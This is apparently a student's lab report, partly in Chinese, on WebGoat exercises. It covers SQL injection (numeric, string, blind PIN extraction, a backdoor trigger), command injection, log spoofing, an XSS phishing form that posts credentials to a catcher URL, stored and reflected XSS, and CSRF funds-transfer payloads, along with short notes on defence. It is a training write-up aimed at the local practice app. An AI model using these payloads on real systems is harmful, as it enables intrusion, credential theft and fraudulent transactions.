1 Basic questions answered
1.SQL injection attacks principle, how to defend?
principle:
By SQL commands inserted into the Web form submit or enter the domain name or page request query string, and ultimately achieve the purpose of deception server to execute malicious SQL commands. SQL injection attacks is to use is the use of loopholes in the design, run SQL statements on the target server as well as other means of attack, no data entered by the user is the main filter sterilized successful attack.
defense:
(1) the relevant code injection point of vulnerability for code and SQL injection filter keyword to standardize code security;
(2) Do not use administrator privileges database connection, use a separate authority limited database connection for each application;
(3) the application of the exception information should be given as few prompts, error messages is best to use a custom error messages to the original packaging.
Principle 2.XSS attack, how to defend?
principle:
XSS stands for cross-site scripting attacks, and is not an abbreviation for the Cascading Style Sheets (Cascading Style Sheets, CSS) confusion, it will cross-site scripting attacks abbreviated as XSS, XSS is a computer security vulnerabilities in web applications, it allow malicious code to the web users of the implant is provided to the user in the other pages.
defense:
(1) XSS defense system to use more feature matching manner, are checked for a match of all information submitted. For this type of XSS attack, using pattern matching method will generally need to "javascript" the keyword search, if it is found to submit information contains "javascript", identified as XSS attacks on;
Whether illegal contents (2) check the user input, such as angle brackets, quotation marks and so, strict control of the output.
3.CSRF Attacks, how to defend?
principle:
CSRF (Cross-site request forgery) cross-site request forgery, also known as "One Click Attack" or Session Riding, often abbreviated as CSRF or XSRF, is a malicious use of the site. Although it sounds like a cross-site scripting (XSS), but it is very different from XSS, XSS trusted users in the use of the site, while CSRF is disguised by a trusted user's request to use from trusted sites. Compared with XSS attacks, CSRF attacks are often not very popular (and therefore their resources to guard against is quite rare) and difficult to defend, it is considered more dangerous than XSS.
defense:
(1) For the web site, the persistence of the authorization method (such as cookie or HTTP authorization) is the instantaneous switching authorization method (provided in each hidden field in the form), this site will help prevent these attacks. A similar approach is contained in the secret information in the form specified by the user as an authentication code outside Cookie;
(2) the design of improved API station. For this type of resource is created posting operations should only accept POST requests and GET requests should only browser without changing the server-side resources.
2 practice record
2.1 webgoat Download
Download: https://github.com/WebGoat/WebGoat/releases/tag/7.0.1 )
After the download is complete, put the file in your home directory.
Open the terminal input Java -jar WebGoat-Container- 7.0 . . 1 -war-exec.jar
Open the browser HTTP: // localhost: 8080 / WebGoat , enter the default user name and password
2.2 SQL injection attacks (Injection Flaws)
2.2.1 Command Injection (Command Injection)
选择 Injection Flaws -> Command Injection
Right-page box, select inspect Element review page elements to modify the source code, added at the end"& netstat -an & ipconfig"
Click to view, see the network port usage and IP addresses, the attack is successful
2.2.2 numeric SQL injection (Numeric SQL Injection)
选择 Injection Flaws -> Numeric SQL Injection
Right-page box, select the page elements to inspect Element review the source code value="101"to be modified, added after the city number 101or 1=1
Click Go, you can see a successful attack
2.2.3 Log deceive (Log Spoofing)
选择 Injection Flaws -> Log Spoofing
Enter the User Name dgx %0d%0aLogin Succeeded for username: adminusing 0D% (Enter) and% 0A (line feed) it to appear in two lines in the log
After entering any password and click Login, success will append the user name to the log file.
2.2.4 injection string (String SQL Injection)
Select Injection Flaws -> String SQL Injection, right page password password box, select inspect Element review page elements to modify the source code, the maximum length limit was changed to 20
Neville user login, passwordSmith' or '1' = '1
The attack is successful, a list of all personnel
2.2.5 backdoor database (Database Backdoors)
选择 Injection Flaws -> Database Backdoors
Input 101, information of the user to give
Enter the injected statement101; update employee set salary=10000
Input 101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]'WHERE userid = NEW.useridSet the trigger
2.2.6 Blind SQL Injection (Blind Numeric SQL Injection)
服务端页面返回的信息有两种:帐号有效,账号无效,因此无法简单地查询到帐号的 PIN 数值。但可以利用系统后台在用的查询语句SELECT * FROM user_data WHERE userid=accountNumber;如果返回了帐号的信息,页面将提示帐号有效,否则提示无效。
输入101 AND 1=1 页面返回帐号有效
输入101 AND 1=2 第二个条件不成立,页面返回帐号无效
输入101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );页面返回帐号无效,说明PIN<=10000
不断调整数值,可以缩小判断范围,并最终判断出PIN 数值的大小。最终如下语句返回帐号有效:101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364 );
2.3XXS攻击
2.3.1跨站脚本钓鱼攻击(Phishing with XSS)
使用XSS和HTML插入制作一个钓鱼网站,将其输入在search框中,代码如下:
</form> <script> function hack(){ XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); } </script> <form name="phish"> <br><br> <HR> <H2>This feature requires account login:</H2> <br> <br>Enter Username:<br> <input type="text" name="user"> <br>Enter Password:<br> <input type="password" name = "pass"> <br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR
输入后下拉网页,会有用户名和密码的框出现,随意输入用户名和密码
2.3.2 存储型XSS攻击(Stored XSS Attacks)
在title中任意输入字符,留言板中输入<script>alert("I am 20164302. You've been attacked!!!");</script>
2.3.3 反射型XSS攻击(Reflected XSS Attacks)
在Enter your three digit access code:中输入<script>alert("I am 20164302");</script>点击Purchase,成功显示警告框,内容为我们script脚本指定的内容。
2.4CSRF攻击
2.4.1绕过 CSRF 确认( CSRF Prompt By‐Pass)
查看页面右侧Parameters中的src和menu值分别为274和900
查看页面右侧Parameters中的src和menu值,分别为2078372和900
在title中输入任何参数,message框中输入
<iframe src="attack?Screen=274&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=274&menu=900&transferFunds=CONFIRM"> </iframe>
以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的(宽高设置成1像素的目的是隐藏该图片),用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交
在Message List中生成以Title命名的消息。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。可以从左侧的任务栏看到任务已完成
2.4.2 跨站请求伪造(Cross Site Request Forgery (CSRF))
查看Parameters中的src和menu值,分别为312和900
在title中输入任何参数,message框中输入
<img src="http://localhost:8080/WebGoat/attack?Screen=312&menu=900&transferFunds=5000" width="1" height="1" />
点击 Submit (其中语句中的&transferFunds=5000,即转走的受害人的金额;宽高设置成1像素的目的是隐藏该图片)
3 实验感悟
这是课程的最后一次实验,实验内容并不算太复杂,在webgoat上完成,还会有指导,通过实际操作,对SQL、XSS、CSRF有了进一步的了解。自己在实际动手操作方面一直比较薄弱,可以说这门课程对自己来说是一次磨炼,收获了不少。